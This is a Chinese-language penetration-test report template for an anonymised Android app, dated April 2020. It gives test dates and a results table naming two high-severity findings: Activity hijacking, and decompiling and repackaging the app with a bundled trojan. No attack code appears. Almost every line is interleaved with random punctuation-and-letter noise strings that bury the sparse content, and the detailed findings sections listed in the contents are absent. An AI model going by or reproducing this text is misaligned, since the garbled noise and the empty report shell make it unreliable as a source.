# t% t( H: G, v2 `+ w+ Z/ L7 \- W- d q: c) i3 x) W1 @
2 ~, e: U% ^2 K# x" P. T, G% v: f+ U! Q$ P- Q9 d
9 w& I# V. d. d/ G
7 H% T/ T& N: j, b
) a# G7 r7 @% x3 t
2 q) p/ ^% l" _. W 5 a G+ E) @1 ?" n( G$ u: c2 @$ f
9 D* M) G. x& t: T5 f
U# n6 \1 z g9 F, A" O4 x1 e. w( a6 c# u/ v) l
文档编号: 1 P# r! g7 ^5 e. p
) C) m4 V/ \* E- Q
0 `. O9 f: _. Y& N9 a
% r8 E- `2 I0 d* |$ f% A) N; X' r f
" x, b& c. C4 M2 @& m( ^' x) ^- _
& f5 f$ X3 F. \$ E& N \. t
8 i% H2 D: A: _- A. H3 \
9 [, H& y C" D+ z: j6 Y6 G6 `
/ I4 [$ J" B' ?6 l. C* f
+ u3 x+ }( s, \# l% @- J
s5 F8 V+ d$ i( U) K: V8 {2 U4 f& M" d% V/ g9 P/ E+ Z( Z5 ]
7 A3 z" [2 M5 a" N7 v7 f: b' r/ _/ U
3 ?! n5 ]+ j/ `; t( m
# |" G7 G$ x$ X* J
% G& B: y b. G% z# A
! @8 K" ^: W0 ?& p/ G % s& l% ?9 }/ J- n, o
: i/ q' v) X" D# {* B
9 K; n* t5 S, J+ ^
; D; r9 y' F! ^- [
; O2 c- o/ j7 R+ s J
6 [7 U n; D/ }8 X# |- K
2 o4 k" M' Z4 [: ^9 Y. h: }3 A# z
/ @1 E" z, h+ }7 T% D
: r: c$ k, I2 c- J! z' z
9 n" b8 G: J2 c' j2 u! f) l* l
/ k$ C' _- G: [% u* f
( E2 D: G) w" L. k1 | + n3 {, m/ c4 w7 U6 b
& N& K& e) F' x
1 Q: }6 X' Y5 R ~2 V5 _
! f) ^& ~3 z1 t4 R) L1 N; j$ d
! v. `0 H9 `% r' e- i$ E
! h$ S8 U4 f: q( S' {# O6 p, \! q 某某某APP渗透测试 ( ^, u, K" J) Q7 e( M/ k
5 U4 k& S# _% w5 L! C" l; V
g& S+ w- a2 h5 B0 Z
6 K# }6 _* _) I( s& U
" B; y$ C2 _+ ?, @9 B7 J! \1 [- o) i0 v w
( B ~( m) }7 N$ G1 ~- ^( H
# R! d# `' e) n4 W' G# ^
) M/ `; R. r- O; I
: H" ~ _, n4 i$ r, X. o w7 V0 C! e9 A9 y4 g
2 |8 C, w/ ^# j2 }1 ^6 B9 M
9 D4 B. _ _3 ]' Y$ k' @& b/ n
/ t- Q4 G, X' U" J5 H
- W) v! p1 w: _ s
3 {2 Y8 H2 i% R& C- Y3 ^* |
' Q: }5 d* ^ F3 M
, J! L3 @) g" B/ T1 S' ~2 D: K# U
# G8 c( n, W. l$ W
4 h! _# Y0 D* z' A+ f# {* `
. q6 _8 @7 L; s' i( l
& P( }/ a6 |3 T7 X * a, {: F+ q* w# \$ e! n
/ B0 Z8 O& F; V5 i4 Z
+ g9 ]! D1 i# u1 E& }2 f
$ ~. ^& ~1 m* v# c2 @& d$ ~* |( K
5 C+ J; i& Q1 U4 V1 m; e
; B/ b4 i: C8 T7 L/ w: I/ E. Q 8 W2 v" V2 ]2 ~, x$ T' {# Z- F
[) W8 o& `$ Z* X% K* _
技 术 报 告 3 G7 i0 J; |$ }
8 k' k4 m: I$ n) L5 o# c1 ]$ a$ f
/ h; z9 w; i, f! C+ _& X9 \: |
# o+ Z6 x& T/ \9 a+ Q# l! a & c6 `2 X( ]; R ~
) m$ s9 V' m0 L; Q# E
0 u" A6 I( r* K
* f6 ] `1 }6 r
. ~* d7 Y% f' z% G* {; u4 N a3 c/ P9 z2 ]0 n( c
( v/ ^ M9 q3 ?% V' P" s7 q
( l- h s: X2 l; l7 p8 y$ B# l2 | & s" g, Y1 H. t/ x; D
9 L, V: c0 B# W2 r5 g5 J
" Y+ b7 d' G" `- \
2 J$ K- _) ]- H( [# A4 ]
* K! `% D- V' U- ^8 Y5 Y1 Y
w" _, C! c5 v/ b& Y* y
9 V+ e; ?. l. N* [
3 a2 m& v) { I& @
; ]1 a3 E$ U# o" d3 P+ h4 ~; `4 _. Y3 |/ a ~1 M
2 L. J6 D7 q* W. W: t( H; C$ Z. ]$ p: K" ?
$ U0 T) C9 }3 ]/ I& x$ G7 Y3 s1 X' M2 j; L5 L5 l
A$ t8 z6 F; r4 P3 y* D5 {: p
# F1 N/ Q9 H% l) r' {
+ ?7 d6 q2 @. z
/ b6 R0 M( a. B) G" a$ M0 H 3 c0 F5 i' u' f, i
' W' O& ?% ^5 t' F: F7 w
7 W$ v( D+ M. s9 V- Q, l3 e
2 _9 E6 X7 k( ^! P0 r6 y8 I. O 3 y' a' [. m3 t# h; e6 E. `
) d1 R2 b# P/ m _8 u+ x
0 D1 w5 `* U `0 I1 n$ W$ E' A* |
' A$ B- Q0 n# `* X8 p! n
5 C i: j9 b I, [$ P4 W- K2 k+ I4 [
D, _! Q9 Y" S& ^3 W
; z- s& `6 ~) i- B0 C/ ~7 K% e3 R/ M
5 l5 ^0 ?3 L1 M3 m7 ]6 o# R% f$ w1 T' i S! C9 {/ l7 i
5 j" q% }# f3 P* v0 W3 m5 [2 T
3 w3 |; O- H' P4 @ G) J$ T
: S! m5 r; Z' f6 t. z. `
5 k8 s" [0 m. q" W- Z* N: F) s2 s( F
7 K% N* j7 q- v/ h/ @" F% Z9 H. H+ S- \
8 W3 M+ U8 ?: C t. `* s& I
7 \" s" n; P( t: ?) Q2 p 4 ]7 K7 `; V. G
& ]& u* M+ v# L2 i/ m: B + X& ]# J2 X2 J0 Z
0 q2 ^8 T5 ^$ ^& u5 _+ A5 L
2 d% V2 s2 k2 C) g4 D+ x
4 G _6 q; g: S+ x( h8 i; C $ R: H! p/ Y) b) a& |: ]6 F4 w
, @# v/ e; d. t: O) y/ k
/ s* l1 Z7 M5 e6 V; j
( p" w$ t7 z; z! c3 O* R" d( k
8 P. D7 b0 a3 A) v* v
. M4 T& D2 c7 u! S* T- P+ D; Y( ?5 J( r
5 ~% P3 w6 o3 e* w5 R0 c4 z' J+ S3 Y
* B; V# Y% y) k! q
* ^( p: }5 U! V1 }% U4 z7 k. v0 {2 s, Z- B. S, I% T
& ^9 v6 Z, Q: U! w; B
. z9 M9 w6 Y z: }2 g , J m7 M, S- q7 ~# o
' y, C( w" a2 W- L 0 u ]( ~3 {. L, \
$ x" J2 z+ ~. C+ H. b
' c8 _) Z$ ]8 P: ?
. R* Y( O6 k: C4 o( {2 w9 L
- p6 h' _% s( Y7 X- a! R7 A5 Q8 c- f: f& j
) p: q0 n% E4 }% x: G; a; H6 t
/ K* c3 m0 I0 }& x
2 y H% B: }2 @# e4 l) z
4 T. \" n! k" ^- p
! ]0 B% f5 f9 K2 m7 k, R; }% N) ^) G3 Q* {# z
5 O& X3 {* H, I* O* W' t' A: X( \! [# m
! a" z7 f+ N. b. y% w9 S1 Q
' {/ _% B& o- k! f8 `
) r+ }& Q7 ~) x
* ?! ?; M$ Z4 a6 e/ _
6 W0 b; k O1 h; u1 u o) l9 g/ L" Y
9 o8 l- L& U8 A) ?+ {2 U D$ g/ ~, c+ q6 w
, c- E( C8 J9 n+ Y$ }; q
/ J! g/ ~# v3 ], p# X; s
5 D! Q+ A: c+ B s$ I
) E$ O& j# h E, E% W
- x( T: m8 v1 t+ p
# N, T( E/ m+ k7 c
, T2 s( A+ T# Z0 Y+ o. g$ l, i# a% ^! P8 P2 C5 H. P
$ m& `9 w( n! q* F! L6 s
7 H+ S# C% A8 E; `! h n! x
" M5 z" G; T- _9 P" Q. o2 o
e+ A4 R2 ~9 c6 @6 S/ W
/ {! X: u- B w' {- ^7 V" x% \ ` G+ k& P2 x5 Y
6 k( x- o9 I6 O, S6 Y8 ?' T, k# x' `& D* V0 D2 y/ m n
) X W2 b: m3 Q. A/ k1 I) k
1 o- g. A# _0 R% g6 A2 g8 m' s; o ( r( q* z8 a: V7 }5 T
; R: S2 l. b* M. `: o 二〇二〇年
/ i2 L7 a, K0 N5 A( s, l) i+ K6 X4 u$ T" z+ L
) p7 ], V3 ^' q3 s5 [7 I4 L& X2 Z; ]0 b0 J+ u$ h- [
4 B$ g, Z: @& |- x' |
" C6 O/ T( Y: q
7 Z- i8 h$ P6 E0 m& b. F- m, U
" S6 t n4 U. U& p' [
* H7 m* Y4 k9 P% [+ m1 h6 f0 r6 C- c8 k0 V
5 D. b; z5 H+ J2 E# H! Q; N
/ v, k5 g- w! v
# h4 ?3 ]8 b" a+ c' y' z8 t* V8 D1 g# @6 M; g+ h/ V ^
, Y f% ?: ?: w
7 V# a0 {* J- V( X
7 s4 X( f; i1 \+ w6 ?5 G
4 Y( z& d1 E) Q( ^: _. s; t 2 c" u7 f/ ~4 w, @4 h9 g
' p$ r _' e0 N5 Q6 F 3 Y6 r, R1 }4 H# x A7 D
9 y& L* L% a) } 目 录
+ `; I/ |5 d q% Z7 ?' x0 c1 C& l) a$ |6 h! @/ U+ c
O$ c! w% ]4 T1 T" ~2 z
1 z9 ?/ ~3 ~1 S5 \9 y0 v3 Q* x
9 V" |( H. o, t( M' Q% a
& R1 m9 W" N' @( m
% y: `( h! P$ V |' U
) F" G& ~- _; ^% I
5 o; I7 r0 G: f% _* A% Z
8 g4 E {: I: u+ \) F2 P: n" Z
& B9 J; g2 J1 [0 a- H' d, f
/ f1 K7 `; I( O- ~! ]; G
) |, u! t0 m) s) r' X3 t0 T: @% p
$ g% i: L- X) P- q7 }. T Q
1 概述... 3
( u8 Y. p p+ f9 z2 r( D0 D3 U }5 o l% c: o! d( l' U3 R
- g3 I+ ^; ^0 y0 w' c. Y# i
( j5 n& S; W( |, w) e. ]# K ! U2 H3 h- a0 h, }
+ F8 m$ H& {. x( X! u
1.2测试时间... 3
5 ]% B3 ^' V, k7 I) L/ L) c! B7 ]- V& f7 P7 s
- d9 X" i, s6 k3 G
, a( _1 `( D! p9 I: n 6 T/ e/ t0 ~8 \3 M9 m
% H1 G8 r$ z# _, L, A# a 1.3测试对象... 3 8 K# \! s' `0 T' H4 L, t7 ?2 k
$ c* f$ Q1 {4 }8 F
& B* `1 J9 y6 D! G1 ~: ?, M
, M9 ]5 W9 G, o0 T; Z, C3 \
7 _$ Y) p; |" `+ v' \# e( w/ {4 ]( q8 M; Y$ G
1.4测试结果... 3 2 E2 Q0 e- c( X7 `( t& O) k; O
' |0 g- R5 I& h- N: k' n/ b
( z/ h5 P8 s/ h4 Z
' l0 j3 U y* g' X1 K/ {# v4 G9 V
' i; l) F# q+ Q$ P& O9 l5 P, u# R- ]. g- e
2 检测结果... 4 0 Z" u# Y6 b2 R- E
, x" d% } Z! s1 a1 z
4 T8 s7 Y$ ]5 e* x1 i0 }
: ?: q* l: o8 s$ F ) Z' k! J6 Z9 W; S
& g; P1 E: k5 o5 v 2.1 某某某... 4 . ^9 v8 l$ J, ^3 s& d( d0 R7 y. S2 m
# Y. {+ i6 ]! P3 f" F$ \1 h2 \% H. I
; B, [ k" n# A3 s$ j% E- k4 `5 `
* T- [) W- ~% l; ^( v
& m4 m! ~% Q4 a3 y 2.1.1检测目标... 4
0 @, ?: B% K* j, N; Z8 l9 z/ ^+ t) v+ o! m$ ?2 j0 Y" e; w( F. V
$ c% g: k! ?: W) w1 n/ R6 }
' P4 E, E% |, x. B& c9 l , P6 R6 p: ?+ v5 O5 w
' a1 G3 e+ D: b. J! V5 g3 | 2.1.2检测结果... 4 8 v* r4 \* |% i
5 i; A: C+ Q$ U1 e: x
( v5 G3 b( j, Z2 [ \. r$ G! o( _* _8 J4 W$ F* U) ]3 h
% b+ c% ]) w- Z2 @8 g
4 P4 z4 e! r; ^" s 2.1.2.1. 4 $ g6 `) Z7 i2 s) | m7 W
0 Q+ n& k+ U' V5 p0 Q( h( ]% M0 C
: W" n6 r- ?( F
; S' t; @0 U# u t! V/ P # ]: k$ Q% A, m
% |* _6 p$ v8 `- Z 2.1.2.2. 6
. {* d3 {) ]/ a" h0 u3 v6 U4 J0 B$ a" }+ O+ U# K* y
( b( h, \5 P- m( M1 q# h) j( Y1 a4 S( T8 o9 j
7 I7 ]- n: P5 p; i
4 k7 l3 _0 l+ _ & h* f- Q! f# q
8 B/ c5 V0 v M
2 I9 t" c. d) p, Y
+ g$ r( F4 W+ w; t U/ Q* O7 } {; O S' s6 c2 V' y! Z
. H) m/ \- U z; P
( e* o4 S# h) [2 ?$ n6 P3 U
) k& l1 R' F7 i2 Y: E' Q% O' `
3 J# y$ l& D8 U/ y. _ j: M% d h, l- @( N; J* C' |; c
' m* n/ E. U# ^! U4 r' n
2 }; [- o% d; J, m ]; `. a 5 _% u9 Y2 `3 N9 k6 j% T/ d1 O
2 V7 ] d r9 d% y# W 1 概述
m# E( |, @6 `! v( M7 q0 V$ D7 r
/ Y5 ?+ K% }& t" W2 U
2 [- O! t4 v) N( r! I% {
3 k' H# U$ M; e
- H) l' ^6 O/ _0 e3 W, J) s8 |) ~% o
1.2测试时间 ' l$ p" [& q1 M/ G6 n! F
0 K" Z, y# v G( Q+ Q& P
! c3 [& e) J. f% E2 n8 H5 o& H4 t- g5 q% p5 v
5 j4 p$ n% [4 @! z4 U5 m" ]1 O
3 K7 E3 O# a" ? p- ^
0 [( `0 h7 e: [3 A
; `7 \% K# e8 l & d1 s6 j4 [9 V, W
7 R. y4 m" `: L8 a* Z 1 g" h6 H! R$ E8 m. O
% {7 Z1 M/ H5 D8 u3 y
5 s7 @% G% { c6 c$ q+ X: D" ~3 X3 ]# W* y0 g/ K0 @
渗透测试时间
; E _+ ?! h+ {! A& q3 Z: D: i! x5 u; i4 E. E! L7 @; j
) Y! @# _* y! G$ J1 W, t
% b/ Q: I9 u" U" B |
# l9 T/ u' y8 f
, Z, m" ~& o: X! l; @
. J7 g9 k, e& Z+ p! K8 L2 `
! n1 h# ~3 }$ [0 f' y$ m/ J # T7 {: Z9 _2 Z9 |" x6 B
* g0 W! K9 N5 B8 C
5 _. S m- O% R$ H, ]* V) W
3 x7 C- @) ?* A $ O: e& b7 |$ w+ f8 R {
@/ M% L$ a4 _' v8 Q 起始时间
4 r# V# ~' [5 s* Y) P5 m7 L
6 W9 G, r0 }: K$ p4 a - M a3 U& V" G" L \& C$ t
5 `1 M, J$ {$ [1 y |
+ D9 \& a* Q( V- M, a) L, m1 I( Z/ o* o% R$ D7 Z- x
* Q$ h/ C3 E3 P2 l* U0 \
3 J# Z. e' ^+ s( T& y. l
* o6 o; j K8 m* S" j8 h- t# e/ p( S' ]3 i4 q
2020年4月6日
: o& `* B9 d2 g- n) b* T1 J7 s, Q Z5 y1 B5 u1 S
. v Q! e' e5 k; `% q5 I! a
+ P5 N' y9 z( ^' N5 ^! ?: y H | 1 ]2 h# K9 P5 |, }- J& J1 d
+ J6 ]+ h; m D: L) |# A
! t! y- Z9 e" c$ @7 x# |+ ?2 H5 Q, H
8 }; }2 Y* V; M7 j
# n, V, i u: W/ v8 \) R5 [
% p' B# n0 |3 _' S6 i4 G
$ [+ H( p+ c: ]! O , L* j$ T4 W& G: R6 R2 T
; ]* ?: E& z; x a% U) p- M* q& r 结束时间 . ?' D) c- B% n: \
: c4 @- g% X( _! o
) `0 p8 Y, D8 M* |% C @9 d, @, v6 v; \
|
# Q. s. D/ w8 S' }6 k0 Y' Y3 K$ h
m6 ~5 E. e, H0 O- R! e. L% I+ P
L+ q) ~. F7 w# I2 E 6 n0 ~) u& }3 z0 Y; j( p
) A- b$ I0 x1 Q/ s( v 2020年4月9日
8 N' p+ Q Q' X" b' g- j
1 j* N2 r: d! f- Q3 G- |1 u ( O2 d6 V2 T+ M% P
2 O" m; L2 z6 c* _; @& ~4 e
| * w/ I; j) @4 h2 x3 `
! _ L6 {' u5 h( l
& t- _+ ?8 G; h2 W- j, @; g
( ^2 |0 ?% a; u" B, k2 p: K
2 ?. f& _) E# p0 V" k
7 o1 x3 P) q; k' r
2 ~7 ]. o, Q. P8 o1 `+ J( g8 C9 g; y9 F/ T2 q9 Y
; j- [5 A$ j4 D4 K5 S6 Q) N) X
" i7 d) [1 z$ [" z: l* P, \% _
1.3测试对象
6 z" R9 q4 s' V
( J0 e. ?( w: z3 V/ l) J
# I) N+ z+ |' _
, u- J# J' t% `) L; N - J6 H( I2 z: H& c
& E" Y% i7 F% r) {: x8 }9 \% m9 F
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: " l" y% }8 ~; _* I3 t$ b* S( S e
# @" p p9 U6 t! Z
+ E D3 G3 `6 c, i: |
8 m! d% T" q6 B: T! F" v/ b. R& J% w( M* Q 2 Q1 f. K) ^4 B' e. K
7 j0 a% M S; `- J0 Y$ A- f+ ~ 表1-1 检测对象 # _& G9 d: r; M. b7 P
6 L- K+ _* A. G& ~
3 F5 I, A# o3 B6 i: f
$ }9 J+ Q9 b) N2 T ?
5 D0 A# F7 Z& y
3 ^8 ?' z) r6 ]# g. U2 b2 n " e" _" y/ q) F% Q! X4 ]
6 ?5 k5 q# A' T7 i* V$ Q i& _, F% Y2 n
: Z9 T L( ^8 }1 K! C
x0 `; f# q6 E7 k9 b
! }* X8 O( {4 @! B- M # e( O* l# s& N, n/ C( j" j" W
1 n' ~1 y& q- Y9 J' f J8 W
序号 9 S% e$ r3 {; D
: v4 v0 i- a- E: N
8 M* e1 r$ ^. N& U
, U( D6 V# M4 }- O |
7 w, v8 C1 C; {5 A7 R: \4 ?
" \8 m0 w- Q, f: K7 s* g
/ b2 R5 P. `! ^6 s% j
9 ]* v/ ]) N: ~3 S! J. e/ Z8 K Z- Y3 c3 ?* l2 l0 _6 ?# d$ ]
# X3 \: R O* e5 N% Q+ K8 q: j! q. R 测试对象 9 w4 p+ V' A" h5 v( e& w
+ h2 Z9 a6 s$ m* ^* d+ y$ p
; _# Z/ P; l/ k: {+ p) n5 C; L e' o, c
| % i' S& k5 }7 R& z) v2 |' l
S5 ^5 i, a* K+ B
4 c5 Z w( T) ]3 z7 g5 N, N/ F
- H4 Q5 H+ @5 n1 V
4 s0 A( E0 v5 w
8 C) ^- Q7 ]3 y% m" A+ z" H 测试地址 3 [8 |& m$ Y/ [+ U l1 p( {
. z/ P* R! V- Q0 Y 9 {, U( M' K/ L. D h( x, K! b$ c
% M T3 o+ d E {( W8 F8 |! p9 Z |
4 i' M4 Z3 `( g- w" i7 G' ?9 F) }9 w% T+ M" o
+ ?- [4 s0 `( y$ C* f
$ C& B8 `. b3 i
9 C: I& h. V# q2 b
) H+ ~: ^: x8 v- j) `& ~5 F* Z: A 安全漏洞 5 t {6 o+ D* M6 }6 P* d7 e q
: `' G! N: J# C/ I6 g ( W! {' Y4 s+ ]4 L- x( E+ W
5 p3 ?9 ~% K* y2 _% X# N |
. p. ^6 g. c1 `- j! r3 k
" j0 X4 [# T% f8 t
5 Z& D+ ]0 M' w b$ U' x
$ U$ q) [8 x9 l$ r 9 A4 z+ p" H1 s0 C1 F' s2 I
( `2 D! ?2 l/ \ s . B# v$ w* g# c2 v
/ w- @1 |* I7 _% S 4 f( m6 S* Q- O+ G
) G& W6 [$ X* l8 Y( Z/ T 1 / I8 n. A# C7 J* q4 k7 a
$ o5 y& g7 ]. T- ?* _2 q2 Q: m) }
- s2 ^0 a+ c& r, e- P
/ q$ F- G. Q7 p2 S2 w | 7 p& z) K ]7 d# D
+ a/ Z% t V% X
# C2 j8 R6 R2 U; z
5 T1 R+ O( F7 v/ @% r & a: {0 ]( ?* K7 e% A$ u8 l: V
+ |+ ?! p: ~6 |6 s0 O 某某某安卓APP
+ s: l/ E) ~! Q# ?1 `9 O+ `1 x( {' b! L. z) s! K% I3 e
5 G+ E3 w( w8 B7 }
: D+ ~! Z I4 ^% h! h0 k |
0 ^3 c8 X; H( H9 r b. O
- T# B3 C2 V$ f" n0 M ! s5 i. ^. }/ [' W7 X% X
; g, U T( E. H* s; \ 4 Q' F/ Z" N$ M# _, l( A( K# m
/ S8 _ U% y; S, c
% N n3 {- x5 P0 G9 Z! ^: h0 U& j m
1 b; @8 I) w0 Y. W% s
/ L$ \6 ~+ L' e
# k- h' j- p1 g" H- S |
" G a/ b& V, k9 I5 A
. k" A* U6 L9 M6 @
" y; w* o0 L+ K {% h4 p1 I/ u0 J* J( w1 P
5 T- N2 c) Y6 u" r- l N
8 J9 E2 u+ D( P4 d! E
2 - C# r+ b8 G& O# o+ l9 Y5 _
0 q9 U7 ^4 K# P* n
9 U- S# A. Q3 h- e. m3 E2 J( e3 p" b' A# _/ N' b7 q
|
7 [7 z B, J3 D* l4 `" x( N
; @0 g8 _( A& f+ t4 m+ A
: f# o3 _' ]/ K0 l1 Z# ~
; x8 p7 B0 S* q' S
. ~1 y3 B- T! K# |! r9 t$ s
+ L& \# \, O) V' f' z% w
6 Y1 m( G8 ^0 ]# n( D+ V% q) J: o8 O1 u: M- d
4 S2 n, q2 C& G; ~' {
0 D: q, b% F4 H 1.4测试结果 9 H6 x5 Y5 Q( L! ^! E
$ u/ `7 ]$ e6 f! [
0 A6 U% N: a5 s- ?3 A3 E6 z
, V( y, N3 P1 n- Z4 q$ K - }0 m4 I& c8 V# F6 q2 g
, u7 a# T. Y9 K _7 r3 j+ {. u 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
( E' c1 O& v6 O) t) D. `
# x5 V) k8 i5 X9 S3 T- m
6 ~5 R7 S( w9 N
; v% m+ i, L: t) ~1 R/ q0 t
" z- S, {' s- _* M" Y( y+ G0 P6 x; F+ I7 C J% d
6 b( q- P, w8 t3 Z9 l" `
$ B4 f0 f8 V6 \ v+ f& i6 h
5 Q3 k7 }% A2 G+ P
$ T, P2 r, p- e/ b6 A8 M$ m0 t
( l3 X& ? [( Y
6 }& {7 E. C3 i . ?1 R4 C7 w1 `" |- j) b5 T
( ?4 w7 D& N8 q# R8 ^
7 u- K' b7 Y' {* O; U% G$ S
" R9 `3 b# J4 R* O( [, q / x' r0 S) l, b5 N
* [7 G6 k7 d& |' F* c
# h, d7 V6 h+ R' f* K
# o: R/ a+ ^1 V; V' P* T
7 V; X4 ~, X" P. J2 b9 ]
& [7 P6 r9 O! u2 G8 G3 k 序号
# X5 Z6 ? \0 L& S/ u0 \8 Q$ m% l$ I9 E: f! v2 ]. U
. M" W, E( \" J3 x; ]! u% |0 \+ a* v- Q& i2 H% e$ f
|
1 L* T% j, |+ H7 f& w: ?/ V @6 i
- K1 H7 E' c7 K- \
3 r u! l3 D+ \; L% N- U* z* g ; o0 v2 h) @2 p* w
6 L0 l% q5 B; _0 y* \; n 系统名称
( k" q& |& C# I# x0 x" P8 A1 F. i4 G* I' u" G4 P: { X/ [" @
8 U& @9 J# V& e* _* X w5 _3 X$ R* Z! a" G1 ?5 M
|
' @ j/ N1 W. R( F1 Y2 x: {( Z, j: y& D; O- H) J8 w
% m1 I) i2 x$ _6 M) J. a
) Z% j, `+ @4 ^! J
q. [7 Z" a& @2 n2 V+ r; ?; }6 K" W$ f" s, E
漏洞名称
: X1 I# g- D! t7 ^- S
4 x/ f& T( K: I: |1 |9 f) e 8 k$ Q2 w5 V2 L/ B; {
( `9 K, H- s. p! N# T
|
+ K9 l( N7 V+ O4 r/ |0 ^- y9 X( q# V( i
2 f/ b; ^+ o8 I! d$ ~7 b & r$ a( U ^5 C: m$ Z, }2 h
! N6 p4 _$ Q& K" l, C. [" R* B 4 o9 m* `/ R% d$ P' {3 O2 ^$ {
l( M+ [. B4 c+ i9 g
漏洞危害 @; \5 o2 G* }
5 ?; M! n, @( [& c
7 i9 u& R& h D+ o
3 H( M* Z C0 l3 B |
$ y4 m4 M1 n, @7 a& V! j- x0 h( h) ?3 ?4 u Q
' y7 k, ^4 r% u
; F5 K" @# z1 Y: Q3 g& |/ z+ ~) X
4 C; ~3 A" Z' N( F) W9 o4 `2 d7 f5 X6 k; _8 a, J4 ^4 Y) i: s& Q
修复结果 " c% K H' U9 y4 J( d8 r ]4 D( M
! ~! K3 x! J7 x- Q. t; v1 S
* _, O. m/ x- e$ `1 \& V$ z3 k9 N' ^/ x: |
|
1 I8 T7 D! n0 b+ C9 L+ w+ A) K5 E, r- c' m# a6 K0 F
4 ^7 B `' {4 P/ P }
. M1 F0 |2 [5 k7 l% v! |# f, y 3 L7 }9 n, B+ A
& P) | H! H+ L( L
% ^! Z* \% ~, {8 x- _! d
6 d' Q6 |% F6 ^1 k7 N
4 W4 t3 J6 U& x, t8 i! T
- u1 d, i! S# u- R9 ]0 z. n 1
1 W8 }: ^$ E+ p, t, S/ S) g7 |" L, J1 S, X
$ Y+ i0 @/ w0 j6 g+ Q" n2 g/ s- a4 g% f( v4 e' h2 N+ A
|
/ V. L# b6 Q/ T5 P" Z2 h! O1 j) ]8 c3 r
1 X. v, p/ p @! z
5 u" z9 [" a8 C4 ^' q( P' j( u- [ ' q8 T5 \) w. k+ o; M
, t4 A/ T5 U! q% \8 x, A" ~
某某某某某某APP " p5 `9 Z/ n6 E
$ ]* }/ ?$ k% K+ B( n6 o3 L1 B: u
4 W) B0 P% |/ X4 `% I$ W+ M- y0 `7 _* Q. o
| : H p2 C Y4 i0 i- e2 z! s
5 J/ ~, z; f2 r2 a3 D# m - O) P3 T' W6 j
) o! E I. {5 B0 K
$ y: Q! v: E- |8 `$ d
/ ?' e( K7 P9 w/ N Activity 劫持 # a; F, l5 |9 B0 T. H
4 \6 V$ U' z$ ?1 {: i" L1 K ( R6 I Z) d% J& q c: D( p* F$ v8 t# B* x
( i# G5 [. e* d! f6 b8 }
9 N$ `& O/ }: F* O$ C* a
4 O$ Z$ p9 H1 o4 G1 G( l& {9 E
6 c: s6 ]6 f2 |: x0 m, G! g! R! q
: L( q; U7 B4 q9 z) ~+ p6 D' M: A9 i% n0 {" x# {
|
. u# v$ r( b8 N
J; g- k/ I: J & w4 L; C- h0 q( e, p" R
1 C3 n" V/ R$ t- i: C
7 Y. g3 p7 N( N% x O. D6 d( S- t. z {: i- G0 R
高
" ~! O& w9 m# J7 o9 _' d4 A9 N- C
; F6 F% h+ r) n5 e9 E 7 i1 @. |1 I8 Y% e# h6 w
% d# w! E I/ O | / i- [: D- t; D% H$ |. K
2 P! e' l4 {/ H; x9 W1 q+ b9 R
5 i% a; A$ o2 v1 T; i
* v" Z. I0 ~7 R5 Y9 S ( q5 F7 g4 d4 u4 _
& \8 i/ y- D% V _' r6 L6 V7 F
6 l7 Q( {) y5 `1 Y2 G3 o4 \) ?" m4 `8 j# x, ~6 O0 C6 x
; M: Y& K; `& S$ V' p
9 r8 l" @8 e u7 H3 T' B | . J2 w+ ~ d4 {0 E9 m" m
9 r/ U! O3 u! a0 X
" y' O9 I( w/ {4 E5 @. N {
% n) O% [- K6 @: g! d% r5 U - C: I6 l H; t& j9 r
9 u2 z6 S4 i" A6 V2 K
- I! B9 F) e3 ]4 M( U9 o7 P& u
# R0 y: Z2 m$ X( Z
& j- f1 ?# N; _8 s& I9 g [! j0 K; ]) R& u
2
, i9 u; _) K% z; E- t+ j" q4 Z4 W2 m
6 t" G! M" ]" E% |" H$ N
' R: s+ Q* L" V# E3 P. P) `$ P
| % {5 H3 F4 @. b1 h8 x
( E: i8 L: c; {( K' x
1 q9 [4 I4 }# @* Z) ~( q. l3 B$ ]
% a. \! G/ q% ^9 y* s& H- m
0 g9 W( }4 y) L% h* ], o1 N5 l* }) T3 v. z, t% B( ~+ u! C2 ]
某某某某某某APP
, N% J7 Z k" X, B) d/ W' F0 b2 d; h1 g6 s" J. ^% M
; c& C' o) Q1 j
3 y; X5 V! \" F0 h) E4 H
|
$ H& e: |+ ^' ]: N' [ f6 u& Q+ K+ O# o
' D M5 Z" n- L0 }
7 L; D: v# g. `& ^5 o7 ^, H. l
: g O6 b! g* S
( A0 c8 r8 p1 b( ~+ h) Z: l; `( D' v 反编译二次打包捆绑木马、篡改APP代码
6 q/ P3 ~7 h" ?# a3 z1 z. C! @6 m# H0 o; q3 S8 y1 m: Y. B* h. m1 ?
8 K8 N' _8 E; Y) G0 ~/ T; ?/ g2 x
| : H% f' T" v" a6 x# H
' m; X( i4 D; }& g' m# \
# _- ]6 K9 i, e1 i
2 j: }' H' E% c" d! C, b6 i: [& | 0 A; M9 f Y, d5 p8 X) A C/ f- S
( j* v. s1 c* j/ M6 ^' K5 W' g 高 " S' G% A" x! n7 y
* n* E. a3 y+ C1 t) v4 N
8 O \& L( v1 t* |2 w) j' B- p
. U6 O$ @4 s! m. ` | 4 Z0 q) k5 o/ H1 ]& k* C
8 u0 E$ \0 K% ^/ P! ~7 R$ o1 x- A
' E e3 a3 T; e" V) ]) h6 |
+ \: d0 P8 ?6 ?. W3 v' R
( Y/ w% r- {& ]: E
/ c c7 {/ x6 G' f K) f
7 @7 d' |1 {* d9 O' ^5 Z) l) p. u
- G( @+ J. Y0 t2 W' Z, G ! |( Y8 ^ z8 Q1 X5 f
% _% @1 T) e0 P. S9 n1 { |
# J S9 }# G/ @+ P+ @: m9 o; F2 P8 q- ?: B, u" f% c5 ^# Q+ F
) V7 y" x) P% a8 l
* L# k. {2 _7 ?
. V9 |, H3 u/ o8 G! s5 D$ w$ u3 s- m7 ~1 ?
9 v x' z; }6 h! X* r
' O3 ^5 w% q" r* Z0 C5 ^
K$ E: X) s# ^
% a7 ]4 R& v" W * ]( |% ?+ _& J$ ^# E! z6 i W" z
; }; D b0 w' y- ^/ o# ] q+ Z * D# o' r. U" U9 D" d/ y
Y. d* @) j5 L
6 z+ e4 O* s. a( r* p' l
2 z$ r- m4 C: g$ S1 H0 t
) N$ O0 C6 H" j/ L
5 O' b' v' T% G* R; O' E
表1-2 测试结果 . o. @+ ^+ W7 K! A$ }
$ S" B+ q" M7 p/ P2 S! e
! I( e! F; G6 |3 I# M" e$ c6 N: T
1 e. F! t" c1 r- g- Y z- F# ?6 C" n r$ `
